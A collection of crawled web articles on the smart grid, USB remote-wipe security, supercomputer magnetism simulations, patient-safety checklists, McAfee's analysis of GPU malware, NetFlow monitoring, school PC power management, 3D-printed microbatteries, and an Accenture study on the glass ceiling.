IEEE refers to itself as “the world’s largest professional association dedicated to advancing technological innovation and excellence for the benefit of humanity.” The organization has about 400,000 members in fields as diverse as aerospace, biomedical engineering, computing, consumer electronics, electric power, and telecommunications. It is well known for its professional and educational activities, its peer-reviewed and general-interest technology publications, the conferences it hosts around the world, and its standards development organization.
2. How do you define the smart grid?
The smart grid is a next-generation electrical power system that uses digital technologies — such as computers, secure communications networks, sensors and controls, in parallel with electric power grid operations — to enhance the grid’s reliability and overall capabilities. The smart grid extends to fuel sources for electric power production and the many devices that use electricity, such as household refrigerators, manufacturing equipment or a city park’s lighting fixtures.
In particular, the secure digital technologies added to the grid and the architecture used to integrate these technologies into the infrastructure make it possible for the system to be electronically controlled and dynamically configured. This gives the grid unprecedented flexibility and functionality and self-healing capability. It can react to and minimize the impact of unforeseen events, such as power outages, so that services are more robust and always available.
The smart grid also has very important features that help the planet deal with energy and environmental challenges and reduce carbon emissions. To give a few examples, a stronger and smarter grid, combined with massive storage devices, can substantially increase the integration of wind and solar energy resources into the [power] generation mix. It can support a wide-scale system for charging electric vehicles. Utilities can use its technologies to charge variable rates based on real-time fluctuations in supply and demand, and consumers can directly configure their services to minimize electricity costs.
3. What’s the IEEE’s role in smart grid?
IEEE is involved in virtually every aspect of smart grid. Its engineers in academia, government and private industry are helping guide its evolution and standardize its technologies and they are deeply engaged in designing, testing and deploying smart grid projects around the world.
IEEE members have published around 2,500 papers on smart grid topics in more than 40 IEEE journals. I’d like to mention, in particular, the IEEE Smart Grid Newsletter, a monthly newsletter, which provides up-to-date news about the smart grid, results of field tests, as well as forward-looking commentary on important issues. It is published on the IEEE Smart Grid Web Portal, which the IEEE hosts as a comprehensive information gateway to smart grid resources and expertise.
4. Why is it important to have national smart grid standards and is an international body needed to govern standards?
Technology standards are needed so that products can interoperate and businesses can distribute their products to multiple countries or regions. The economies of scale that standardization creates can drive down costs, which benefits everyone. And because more vendors might participate in a market, customers have more product choices. Also, when a technology is standardized, customers can have more confidence that their products will function as expected.
The IEEE Standards Association has more than 100 smart grid standards developed or in development, and these will support a wide range of technologies and services that will be used throughout a smart grid system. Many other regional and international standards development organizations are also creating smart grid standards. IEEE and other leading groups are working together on smart grid standards because they recognize that collaboration is necessary to make sure smart grid succeeds.
This type of collaboration represents a new paradigm in standards development today. Collaboration is seen as a practical means of solving problems that are common to all participating groups and stakeholders, regardless of the formal status of a particular standard within an industry or country.
5. How is the smart grid community addressing interoperability and security as it pertains to the smart grid? What role, if any, is IEEE playing there?
The IEEE Standards Association (IEEE-SA) has published an architectural framework for the smart grid, called IEEE 2030, which defines the interconnection and interoperability standards for the power, IT and communications technologies that will be used in smart grids.
IEEE-SA is working actively on standardization with the NIST Smart Grid Interoperability Panel, which includes IEEE-SA standards in its catalog of smart grid standards. IEEE-SA also collaborates with many standards organizations that represent specific industries, countries or regions to help make sure that products that operate on smart grids are complementary and compatible with one another.
Security, which includes privacy and cybersecurity, is fundamentally necessary for reliable grid operations and for customer acceptance of smart grids, and many in IEEE and the smart grid community are developing technologies and standards addressing this issue. What’s most important, however, is that security is incorporated into the architectures and designs at the outset, not as an afterthought. For the microgrids [distributed resource island system] I’m involved with, we employ security technologies for each equipment component we use and for each customer application we develop — and we do this in a way that cannot be reverse engineered. We use an architecture that cannot be taken down. If any part of the system is compromised, the system reconfigures to protect itself, localize and fend off the attacks.
6. What implications does broadband have on the grid?
Utilities will use a variety of wired and wireless, broadband and narrowband communications technologies for their smart grids. Communications networks will carry information to and from the many sensors, control technologies, and metering devices that will be used in a smart grid, including devices used in homes and businesses.
A utility will use broadband connections to engage with customers for smart grid services. Customers will use network-connected applications on in-home energy monitors, home computers and smartphones to interact with demand-response or energy management programs.
Utilities will likely use a combination of broadband communications technologies, including their own infrastructure for broadband over-the-power-line communications. They will also use a variety of fiber-optic, wireline and wireless technologies for broadband communications.
7. What’s the simplest thing about the smart grid and what’s the most complex thing about it?
The simplest thing about smart grid is consumers’ general expectations for their electric services. Basically consumers expect that when they turn on an appliance or product that uses electricity, it will work without any disruptions of service, it will be safe and secure and affordable.
What’s complicated is achieving the infrastructure needed to deliver on those expectations. We have established the general architecture needed for smart grids and have begun putting the initial technologies, like smart meters, in place. But it will take five to 10, possibly 20 years, depending on the level of effort, to deploy the technologies to create complete, end-to-end smart grids. And we need to come up with some truly breakthrough engineering achievements to solve some of our toughest smart grid challenges. This all ties back to the need for public and private partnerships and financing to support smart grid research and deployments and training.
8. In that vein, there are always pros and cons of a solution. What are those as related to the smart grid?
The smart grid will create a more stable and efficient electric power system. It will significantly reduce the number of power outages experienced in the United States and, if an outage does occur, the smart grid will minimize its impact to such a degree that most consumers will not know that it happened. Outages, such as the one affecting New York City in 1997, would be avoided.
I’ve mentioned that smart grids will introduce energy efficiencies to better support the increasing demands for electricity while reducing environmental impacts. And consumers will have opportunities to use in-home energy-management tools, programmable appliances and other applications that improve their quality of life.
Unfortunately around 68 percent of consumers have no idea what a smart grid is and their understanding is needed to help gain acceptance for the technology. We need leadership in the private and public sectors to educate consumers, as well as incentives and other mechanisms to bring smart grid into reality.
9. It’s not just important to have a smart grid. What other factors will contribute to truly having a smart grid?
Smart grids provide energy security because they help a country reduce its dependence on foreign energy supplies. They also protect a country’s economic interests and the environment. To build a truly smart grid, we need a better backbone for the grid and we must also build intelligence into the system end-to-end.
The desired system will require a high-voltage power grid that can serve as its backbone and also efficiently integrate renewable resources into the grid. It will likely cost about $82 billion, or $8 billion per year for 10 years, to achieve the upgrades needed for the high-voltage system serving the U.S.
Making the grid smarter — which will be achieved by replacing traditional analog components with digital ones and incorporating the computing, IT, sensors and other equipment — will have a separate price tag. This will cost about $338 billion to $476 billion over the next 20 years, or about $17 billion to $24 billion annually.
It seems exorbitant, but the investment will pay for itself. These technologies are expected to reduce outage costs by about $49 billion per year and save about $20.4 billion per year from improved energy efficiencies. These technologies will also produce the intangible benefits of increased security, reductions in carbon dioxide emissions, and related environmental improvements.
10. Why is it important for states and localities to build a smart grid infrastructure?
I’ve mentioned the overloaded grid conditions we have today. Yet the situation is certain to get much worse, especially with the increasingly digital society. Twitter alone puts a demand of 2,500 megawatt hours per week on the grid that didn’t exist before. Because of increasing demand, experts believe that the world’s electricity supply will need to triple by 2050.
Localities should build microgrids because these facilities can meet community energy demands in an eco-friendly way that also provides cost advantages to consumers and families. I also believe that local commitments to microgrids will help the country overall by showcasing their capabilities and just proving that it can be done. Cities, communities, and universities are great candidates for microgrids because their microgrid projects can be manageable in size and the local participants are passionate about the opportunity and want their programs to succeed.
Local entities also can use their microgrids to develop and test innovations for consumers, such as smart homes, and the results of these programs can be used in developing other smart grid projects around the country. | <urn:uuid:8cfcec3d-606e-4ed0-9f84-790fa921bc3b> | CC-MAIN-2017-09 | http://www.govtech.com/security/10-Big-Questions-About-the-Smart-Grid.html?page=1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00031-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946089 | 2,400 | 2.953125 | 3 |
“The biggest threat posed by USBs is data leakage, loss, and/or theft, where data is leaving some secure location and being physically carried away from that location”, explained Ashdown.
“There are different ways this can happen. This can be someone stealing data, or this can be somebody who put data on a device, took the device home with them, and left the device on a bus or subway”, he told Infosecurity.
To prevent data loss, organizations need to apply security measures to these devices. These measures can include encrypting the data and requiring user authentication to access the device, he explained.
However, encryption can be broken and user authentication measures can be bypassed. So being able to wipe these devices if they are lost or stolen is an additional security measure that can be used to safeguard sensitive corporate information, Ashdown said.
Imation provides USB devices that have remote kill/wipe capability, he said. “High security customers want the remote kill to know that the device is no longer usable”, he explained.
“Remote kill is an effective tool to allow an IT department to kill the device and prevent access to it even from the normally authorized user”, Ashdown said. This helps thwart the insider threat, he noted.
Imation offers remote kill capability that can destroy the data and the root key on the USB device, rendering the device useless. The company also offers the ability to lock access to the device, but also to retrieve the data at a later point, he said. | <urn:uuid:618aeb9e-e879-4742-9364-1d5019e3807c> | CC-MAIN-2017-09 | https://www.infosecurity-magazine.com/news/hasta-la-vista-baby-remote-kill-terminates-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00031-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.956118 | 323 | 2.609375 | 3 |
A team led by Thomas Schulthess of Oak Ridge National Laboratory (ORNL) has broken the petaflop barrier with a supercomputing application likely to accelerate the revolution in magnetic storage.
Using ORNL’s upgraded Cray XT Jaguar supercomputer, the team was able to achieve a sustained performance of 1.05 quadrillion calculations a second, or 1.05 petaflops, for an application that simulates the behavior of electron systems. Jaguar itself was recently upgraded to a peak performance of 1.64 petaflops, making it the world’s first petaflop system dedicated to open scientific research. The team’s simulation ran on nearly 150,000 of Jaguar’s 180,000-plus processing cores.
Among its benefits, the application promises to advance scientific understanding of magnetic devices such as computer hard drives. In the last couple of decades, hard drive storage capacity has grown at an extraordinary rate. The associated risk, though, is that with increasing storage density, these amazing devices tend to become less stable.
Hard drives hold information by magnetizing tiny regions of a platter, with regions magnetized in one direction counting as ones and in the opposite direction as zeroes. With the exponential growth of storage capacity, these miniscule spots have gotten progressively even smaller; and the smaller the spot, the more likely its magnetic direction is to be incorrectly and unexpectedly reversed. Since disorder at the atomic scale increases with temperature, a hard drive kept as warm as room temperature becomes increasingly susceptible to random changes — meaning lost data — as storage density rises.
“A big problem in magnetic recording is that as you make the bits smaller and smaller, thermal excitation will essentially randomize them and you will lose information,” explained Markus Eisenbach of ORNL. “If that happens in 500 years you don’t care, but if it happens tomorrow you’re really unhappy.”
The team’s current approach differs fundamentally from earlier efforts because it is able to set aside empirical models and their attendant approximations to tackle the system through first-principles calculations. Eisenbach, who serves as the team’s developer for the project, noted that this empirical approach was far too computationally intensive for earlier computer systems.
“It’s the new Jaguar coming on line that makes it really feasible,” he said. “If you have a classical Heisenberg model, an energy calculation takes perhaps milliseconds. For this first-principles calculation, an energy calculation takes tens of seconds. So it’s orders of magnitude slower. You really need a computer of that size.”
The team simulates the effect of heat on a magnetic material by combining two methods. The first — known as locally self-consistent multiple scattering, or LSMS — describes the journeys of scattered electrons by applying density functional theory to solve the Dirac equation, a relativistic wave equation for electron behavior. The code has a robust history, having been the first code to run at a sustained trillion calculations per second and earned its developers the prestigious Gordon Bell Prize in 1998.
The shortcoming of this approach, though, is that it is used primarily to describe a system in its ground state at a temperature of absolute zero, or nearly 460°F. In order to include the energy brought to the system by temperatures outside a laboratory freezer, the team’s simulations incorporate a Monte Carlo method known as Wang-Landau, which guides the LSMS application to explore electron behavior at a variety of temperatures.
According to Eisenbach, the two methods are ideally suited to massively parallel computing systems. They scale linearly, meaning the need for computing resources grows at the same rate as the size of the system being simulated, and LSMS can be scaled to very large materials systems by assigning one atom to each processing core.
As a result, the team is able to use the petascale Jaguar system to simulate nanoparticles approaching technologically interesting sizes.
“We’re really getting to a size where you could do calculations for nanoparticles that are also the focus of experiment,” Eisenbach noted. “Experiments come from large systems and manage to get smaller and smaller, and we are coming from just a few atoms and getting to the point where experimentally accessible sizes and computationally accessible sizes meet.”
He would not predict what the project will find, since the team is taking a new approach to the problem. Nevertheless, he noted that hard drive manufacturers are watching this issue closely; as hard drive-capacity continues to grow, the importance of a more complete understanding of magnetic materials will also grow.
“The idea is to find materials that make it sufficiently hard for random temperature fluctuations to turn the bits around, so the information is still on your hard disk when you look at it next year. We have been talking with people at hard disk manufacturers. Certainly, it’s an important issue that gets discussed at magnetism conferences.” | <urn:uuid:d71f24f4-6281-477d-8c05-6823216867dc> | CC-MAIN-2017-09 | https://www.hpcwire.com/2008/11/19/the_search_for_stable_storage/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00559-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945965 | 1,036 | 3.0625 | 3 |
Consider three different scenarios that place healthcare patient safety at risk. The first is an individual hazard, the second human behavior, and the third a system issue in the broad sense of "system" as distinct from information technology (IT).
The first consists in placing concentrated potassium alongside diluted solutions of potassium based electrolytes. Now you need to know that intravenous administration of the former (concentrated potassium) results in stopping the heart almost instantaneously. In one tragic case, for example, an individual provider mistakenly selected a vial of potassium chloride instead of furosemide, both of which were kept on nearby shelves just above the floor. A mental slip-erroneous association of potassium on the label with the potassium-excreting diuretic-likely resulted in the failure to recognize the error until she went back to the pharmacy to document removal of the drug. By then it was too late.
Second, a pharmacist supervising a technician, working under stress and
tight time deadlines due to short staffing, does not notice that the sodium
chloride in a chemotherapy solution is not .9% as it should be but is over 23%. After
being administered, the patient, a child, experiences a sever headache and
thirst, lapses into a coma, and dies. This results in legislation in the state
Finally, in a patient quality assurance session, the psychiatric residents on call at a major urban teaching hospital dedicated to community service express concern that patients are being forwarded to the psychiatric ward without proper medical (physical) screening. People with psychiatric symptoms can be sick too with life-threatening physical disorders. In most cases, it was 3 AM and the attending physician was either not responsive or dismissive of the issue. In one instance, the patient had a heart rate of 25 (where 80+ would be expected) and a Code had to be declared. The nurses on the psychiatric unit were not allowed to push a mainline insertion into the artery to administer the atropine and the harried resident had to perform the procedure himself. Fortunately, this individual knew what he way doing and likely saved a life. In another case, the patient was delirious and routine neurological exam - made up on the psychiatric unit, not in the emergency room where it ought to have been done - resulted in his being rushed into the operating room to save his life.
In all three cases, training is more than adequate. The delivery of additional training would not have made a difference. The individual knew concentrated potassium was toxic but grabbed the wrong container, the pharmacist knew the proper mixture, and the emergency room knew how to conduct basic physical(neurological) exams for medical well being. What then is the recommendation?
One timely suggestion is to manage quality and extreme complexity by means of check lists. A checklist of high alert chemicals can be assembled and referenced. Wherever a patient is being delivered a life-saving therapy, sign off on a checklist of steps in preparing the medication can [should] be mandatory. The review of physical status of patients in the emergency room is perhaps the easiest of all to be accommodated, since vital signs and status are readily definable. Note that such an approach should contain a "safe harbor" for the acknowledgment of human and system errors as is routinely performed in the case of failures of airplane safety, including crashes. Otherwise, people will be people are try to hide the problem, making a recurrence inevitable.
The connection with healthcare information technology (HIT) is now at hand. IT professionals have always been friends of check lists. Computer systems are notoriously complex and often are far from intuitive. Hence, the importance of asking the right questions at the right time in the process of trouble shooting the IT system. Healthcare professionals are also longtime friends of checklists for similar reasons, both by training and experience. Sometimes symptoms loudly proclaim what they are; but often they can be misleading or anomalous. The differential diagnosis separates the amateurs from the veterans. Finally, we arrive at a wide area of agreement between these two professions, eager as they are to find some common ground.
Naturally, a three ring binder on a shelf with hard copy is always a handy backup; however, the computer is a ready made medium for delivering advice, including top ten things to watch in the form of a checklist, in real time to a stressed provider. In this case of emergency room and clinics, the hospital information system (HIS) is the choice platform to install, update, and maintain the checklist electronically. However, this means that the performance of the system needs to be consistent with delivery of the information in real time or near real time mode. It also means that the provider should be trained in the expert fast path to the information and need to hunt and peck through too many screens. The latter, of course, would be equivalent to not having a functioning list at all.
And this is where a dose of training in information technology will make a difference. The prognosis is especially favorable if the staff already have a friendly - or at least accepting - relationship with the HIS. It reduces paper work, improves workflow, and allows information sharing to coordinate care of patients.
This is also a rich area for further development and growth as system provide support to the physician in making sure all of the options have been checked. The system does not replace the doctor, but acts like a co-pilot or navigator to perform computationally intense tasks that would otherwise take too much time in situations of high stress and time pressure. Obviously issues of high performance response on the part of the IT system and usability (from the perspective of the professionals staff) loom large here. Look forward to further discussion on these points. Meanwhile, we now add another item to add to the vendor selection checklist in choosing a HIS: must be able to provide templates (and where applicable, content) for clinical checklists by subject matter area.
It should be noted that "the checklist manifesto" is the recommendation in a
book of the same title by the celebrity physician,
"Potassium may no longer be stocked on patient care units, but serious threats still exist" Oct 4 2007, http://www.ismp.org/newsletters/acutecare/articles/20071004.asp
"An Injustice has been done," http://www.ismp.org/pressroom/injustice-jailtime-for-pharmacist.asp
Posted August 16, 2010 1:08 PM
Permalink | 1 Comment | | <urn:uuid:575c08ca-6f10-4028-bfdf-624ec0d185c0> | CC-MAIN-2017-09 | http://www.b-eye-network.com/blogs/agosta/archives/2010/08/healthcare_pati.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00380-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.957146 | 1,328 | 2.703125 | 3 |
Malware that runs inside GPUs (graphics processing units) can be harder to detect, but is not completely invisible to security products.
Researchers from Intel division McAfee Labs teamed up with members of Intel's Visual and Parallel Computing Group to analyze a proof-of-concept GPU malware program dubbed JellyFish that was released in March.
Their conclusion, which was included in McAfee's latest quarterly threat report, is that running malicious code inside GPUs still has significant drawbacks and is not nearly as stealthy as its developers suggested.
JellyFish's creators claimed that one of the advantages of GPU malware is that it can snoop on the host computer's memory through a feature called DMA (direct memory access).
While this is true, exposing critical portions of the system's memory to the GPU requires kernel privileges and must be done through a process that runs on the host computer.
Security products can monitor for and restrict such operations, the Intel researchers said. Furthermore, "this dependency is subject to existing kernel protections."
If the installation of the GPU malware is achieved without detection, the user code and kernel driver used in the process can theoretically be deleted from the host operating system. However, this might cause problems.
For example, on Windows, orphaned GPU code triggers a Timeout Detection and Recovery (TDR) process that resets the graphics card, the McAfee researchers said. The default timeout before this mechanism kicks in is two seconds and any attempt to alter that value can be treated as suspicious behavior by security products, they said.
In addition, long-running GPU processes will lead to the OS graphical user interface becoming non-responsive, which can betray the presence of malware.
Therefore, the best option for attackers would be to keep a process running on the host computer, the researchers said. This code can be minimal and harder to detect than a full-blown malware program, but is nevertheless something that security products can identify.
Another claim made by the JellyFish developers was that code stored on the GPU persists across system reboots. This refers to data storage rather than code that automatically executes, according to the Intel researchers.
"The idea of persistence claimed here is that a host application is running at system startup, retrieving data from GPU memory, and mapping it back to userspace, which is not nearly as daunting because malicious usermode code must also persist outside of the GPU," they said.
While it's true that there is a shortage of tools to analyze code running inside GPUs from a malware forensics perspective, endpoint security products don't need such capabilities because they can detect the other indicators left by such attacks on the system.
On one hand, moving malicious code inside the GPU and removing it from the host system makes it harder for security products to detect attacks. But on the other, the detection surface is not completely eliminated and there are trace elements of malicious activity that can be identified, the researchers said.
Some of the defenses built by Microsoft against kernel-level rootkits, such as Patch Guard, driver signing enforcement, Early Launch Anti-Malware (ELAM) and Secure Boot, can also help prevent the installation of GPU threats. Microsoft’s Device Guard feature in Windows 10, which allows only Microsoft-signed and trusted applications to run, can be particularly effective against such attacks, according to the researchers.
While both attackers and defenders will likely continue to refine their moves on the GPU battleground, the researchers said that the recent focus on this area has made the security community consider improving its approach to these threats. | <urn:uuid:f6863164-1658-4906-b121-b3fbf7806a80> | CC-MAIN-2017-09 | http://www.itnews.com/article/2978835/intel-says-gpu-malware-is-no-reason-to-panic-yet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00552-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94906 | 720 | 2.75 | 3 |
What is NetFlow?
NetFlow is a network protocol developed by Cisco in order to collect and monitor IP network traffic. By utilizing NetFlow, IT teams can analyze traffic flow and determine the traffic source, traffic direction, and how much traffic is being generated. To help you better understand the NetFlow process, I like to use the following analogy from our Product Manager, Ulrica de Fort-Menares.
Think of NetFlow the way you think of a phone bill. When you get your phone bill, you usually see a record of conversations listed. The information regarding these conversations includes the time the call occurred, who was called, how long the conversation was, the actual metadata from the phone call–but not the actual audio data packet.
Why is this concept like NetFlow?
Similar to NetFlow, the header information for data packets that traverse through a device are stored in the device’s cache and then exported to a collector. A collector is very important to analyzing NetFlow data. Without one, you could attempt to verify the cache for what data is currently traversing through a device, but as you can see below that is highly ineffective and time consuming.
What about other flow types–sFlow, jFlow?
While NetFlow is a commonly used name for flow export, NetFlow is vendor specific to Cisco. jFlow is vendor specific to Juniper and sFlow is an industry-standard flow. The key difference between sFlow and NetFlow is that sFlow is sampled flow and NetFlow is not sampled. Fortunately, our network management platform, LiveNX, is vendor agnostic when it comes to our flow collection and if your device supports any type of flow export the data can be collected by LiveNX. Please see our specifications page for more information.
What do I do with the flow data?
You could attempt to analyze a pcap if you had plenty of time, or more realistically you could use a flow collector to store and analyze the metadata to make sense of the information. For example, in the image below, I have a real-time view of a Palo Alto firewall being monitored by LiveNX. In the data set, I see a blue highlighted row that represents a conversation traversing through the firewall. Notice the information contained in this flow includes source and destination IP address, source and destination ports, TOS, utilization and even an application name—all of this is derived from flow!
You can learn more about our real-time flow monitoring here.
Using LiveNX you are able to take that flow metadata and visualize it across a topology to track a conversation through the network. For example, in the image below, I’m focused on user voice calls between the LA and Toronto offices utilizing a filter based on subnets and ports. Notice anything strange about the DSCP markings?
Watch more on how we visualize flows here.
Using flow data, it’s also possible to better understand and manage WAN bandwidth (BW). In the example below, I’m able to see that most of the outbound data on the GE0/0 is video-over-http. I can also see the total utilization for a specified time range, as well as average and peak-rate information.
Watch more about WAN BW Management here.
As more and more applications fight for expensive BW, flow data becomes the path of enlightenment in the network. In the past, if you were to traditionally derive this information, it would take the deployment and management of probes. Now, just by enabling features already available on your devices, you can export flow data to a solution like LiveNX—ultimately helping you to analyze and make sense of the collected metadata.
Read more about sFlow here: http://www.sflow.org/about/index.php
View the NetFlow RFC here: https://www.ietf.org/rfc/rfc3954.txt
Date: October 26, 2016
Author: Alex Cameron | <urn:uuid:41519aec-95ac-4574-b151-a8028abf70ee> | CC-MAIN-2017-09 | http://www.liveaction.com/what-is-netflow/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00552-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.917512 | 823 | 2.5625 | 3 |
Many kids don’t worry about powering down the computers they use at school when it’s time to go home. For that matter, some teachers don’t either.
Why worry about it? Think green.
Computers that are left on overnight can add up to thousands of dollars in extra energy costs — a big problem for public schools that are seeing budget freezes and looking for cost-saving measures. The waste can also sink a sustainability plan.
In Colorado, Boulder Valley School District officials think they have found a viable solution. The district completed a one-year rollout plan to implement power management software in 10,000 PCs to improve sustainable efforts and cut costs.
The school district — which educates 27,000 students and employs 4,000 staff — is responsible for 57 facilities within the communities of Boulder, Louisville, Lafayette, Erie, Superior, Broomfield, Nederland, Ward, Jamestown and Gold Hill. In 2009, the district created the Sustainability Management System, an initiative to incorporate sustainability into education and operations, said Ghita Carroll, the district’s sustainability coordinator. The system’s plan is outlined in a 167-page report.
“When we started implementing our Sustainability Management System, one of the first things we did was to work with our IT department,” she said. “We looked to see what the technology options were.”
According to the school district’s CIO, Andrew Moore, computers were wasting a significant amount of energy.
“Our community is green oriented and felt that too many resources were being wasted by idle computers using too much energy,” he said in a statement. “Previously district computers were left on in full-power mode 24 hours a day, seven days a week.”
After a series of energy audits and assessments, the district’s IT department and Office of Sustainability decided to implement software, called Verismic Power Manager, that remotely shuts down school computers when they’re not in use. Through a single interface, the district’s IT department controls the power settings for all 10,000 PCs.
Carroll said policies were set up so different computers can shut down at different times. An administrative computer might turn off at a different time than a computer in the school library.
Mike Jager, Verismic’s global consulting services manager, said the software monitors a PC’s policy for its prearranged shutdown time. For example, if a computer is scheduled to power down after 15 minutes of inactivity at 7 p.m., the software ensures that it will power down even if the computer’s operating system fails to do it.
Jager said “OS insomnia” — caused when a computer’s operating system doesn’t shut down the computer at a scheduled time — is fairly common. The power management software can act as a second line of defense.
“If the PC does not go down at 7 p.m., our agent will kick in and say, ‘You’re delinquent; you have missed that shutdown setting at 7 p.m., and you have been inactive. Therefore, we’re going to shut you down now.’ And we initiate the shutdown,” Jager said.
Regularly scheduled power-downs are projected to not only reduce costs, but also to reduce the school district’s carbon footprint. According to the school district, PC power management is estimated to save $300,000 and reduce 3,670 tons of carbon dioxide a year. | <urn:uuid:68500978-3cbf-49c1-a76a-8e6a3b796a8d> | CC-MAIN-2017-09 | http://www.govtech.com/technology/School-Computers-Power-Drain.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00252-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949938 | 747 | 2.75 | 3 |
Tiny 3D printed battery could power devices of the future
- By Kevin McCaney
- Jun 21, 2013
A team of university researchers have taken 3D printing to the nanoscale, printing a lithium ion battery the size of a grain of sand and opening up new possibilities for tiny medical, communications and other devices.
Based at Harvard University and the University of Illinois at Urbana-Champaign, the researchers were able to print interlocked stacks of hair-thin “inks” with the chemical and electrical properties needed for the batteries, according to a report by the Harvard School of Engineering and Applied Sciences.
It’s a breakthrough in the development of microbatteries, which to date have used thin films of solid materials that lacked the juice to power devices such as miniaturized medical implants, insect-sized robots and miniscule cameras, the researchers said. Small, 3D-printed batteries also could help propel development of wearable technology, decreasing the weight of products like Google Glass or smart-phone wrist watches.
The research team tackled the power problem by using a custom 3D printer to produce precise, tight stacks of ultrathin battery electrodes. The key was developing the printable electrochemical inks — one for the anode and one for the cathode, each made with nanoparticles of lithium ion metal oxide compounds, the researchers said.
After printing, they put the stacks into a container, added an electrolyte solution, then measured the power of the finished product. “The electrochemical performance is comparable to commercial batteries in terms of charge and discharge rate, cycle life and energy densities,” said Shen Dillon, a collaborator on the project led by Jennifer Lewis. “We’re just able to achieve this on a much smaller scale.”
Lewis, currently a professor at Harvard, led the project while at the University of Illinois at Urbana-Champaign, in collaboration with Dillon. They have published their results in the journal Advanced Materials. 3D printing (or additive manufacturing), once used mainly for prototyping circuit boards and other electronics, has exploded in the last few years, being used for everything from aircraft to flexible displays and, famously, guns. The Army 3D prints gear for troops in on the spot in Afghanistan. NASA wants to 3D print food on long space missions. And the Obama administration has touted it as the future of manufacturing.
Its possibilities are only likely to grow. Prices for 3D printers are coming down, making them available to innovators with any kind of budget. One engineer at the Massachusetts Institute of Technology is even pushing into 4D, researching how to print objects that change over time.
While many 3D printing projects are going big — even to the point of planning to print an entire house — taking it to the nanoscale could have an even bigger impact. With the Harvard/UI team’s tiny batteries on board, the possibilities for microscopic implants, sensors, cameras, wearable computers and other gear just grew.
Kevin McCaney is a former editor of Defense Systems and GCN. | <urn:uuid:e1f2ec0a-77f1-4225-9182-fedd06d946ea> | CC-MAIN-2017-09 | https://gcn.com/blogs/emerging-tech/2013/07/~/link.aspx?_id=B32340BC3006403DAD411EFF29112664&_z=z | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00304-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.938229 | 634 | 3.390625 | 3 |
Yet Despite Belief in Existence of “Glass Ceiling,” Women Report Being as Personally Satisfied as Men in Their Professional Careers
NEW YORK; March 8, 2006 – Despite significant gains in the past 10 years, women executives around the world still face an uphill battle in workplace equality, a new study by Accenture shows.
The study, entitled “The Anatomy of the Glass Ceiling: Barriers to Women’s Professional Advancement,” is based on a survey of 1,200 male and female executives in eight countries in North America, Europe and Asia: the United States, Canada, Austria, Germany, Switzerland, United Kingdom, Australia and the Philippines.
Respondents were asked to score factors they felt influenced their career success across three “dimensions”: individual (career planning, professional competence, assertiveness, etc.); company (supportive supervisors, transparent promotion processes, tailored training programs, etc.); and society (equal rights, government support of parental leave, etc.)
The differences between male and female respondents’ answers were used to calculate the current “thickness” of the glass ceiling — a term coined in the 1980s to describe an unacknowledged barrier that prevents women and other minorities from achieving positions of power or responsibility in their professions.
According to the study, only 30 percent of women executives and 43 percent of male executives believe that women have the same opportunities as men do in the workplace today — supporting the existence of a glass ceiling.
However, the study also found that overall the women executives were about as personally satisfied with their own career opportunities and positions as men were with theirs. For instance, the same percentage of men and women respondents (58 percent) said they are fairly compensated or that their salary reflects their personal achievements. In addition, about the same number of women as men (66 percent vs. 70 percent, respectively) said they feel secure in their jobs.
For some women executives the glass ceiling is believed to be more of a societal obstacle than an individual barrier. Women executives in the United States and the United Kingdom, for instance, are very confident of their own business capabilities (the “individual” dimension) and are more likely to believe that the greatest barriers to their success come not from their own capabilities or even from their own companies’ cultures (the “company” dimension), but from society at large (the “society” dimension). On the other end of the spectrum, women executives in Canada and the Philippines believe that societal issues are less of a barrier to achieving career success and that corporate cultures are more to blame for the glass ceiling.
The company dimension appears to pose the greatest barrier to advancement in Austria, whereas Swiss respondents believe the company dimension poses relatively few barriers to their advancement. In Germany and Australia, barriers to advancement are most prevalent in the dimension of society.
“The study reminds us that while there has been progress in shattering the glass ceiling over the past 20 years, organizations – and societies – need to realize how important it is to capitalize and build upon the skills of women,” said Kedrick D. Adkins, Accenture’s chief diversity officer. “Creating a business culture that supports innovation, growth and prosperity requires people with diverse talents, and organizations need to ensure that they value all styles of leadership and work. In other words, global inclusion is the key to the long-term success of companies.”
The study was conducted as part of Accenture’s observance of International Women’s Day today, which the company is marking through a series of coordinated activities in 20 cities throughout the world focused on women in business. Accenture expects more than 3,000 of its people to join clients, business leaders and academics in such activities as leadership development sessions, career workshops and networking events.
Accenture conducted online surveys of approximately 1,200 senior executives at mid- to large-sized companies ($250 million+) in eight countries: Australia, Austria, Canada, Germany, the Philippines, Switzerland, the United Kingdom and the United States. Approximately half of all respondents were female. Fieldwork was conducted between January and February 2006.
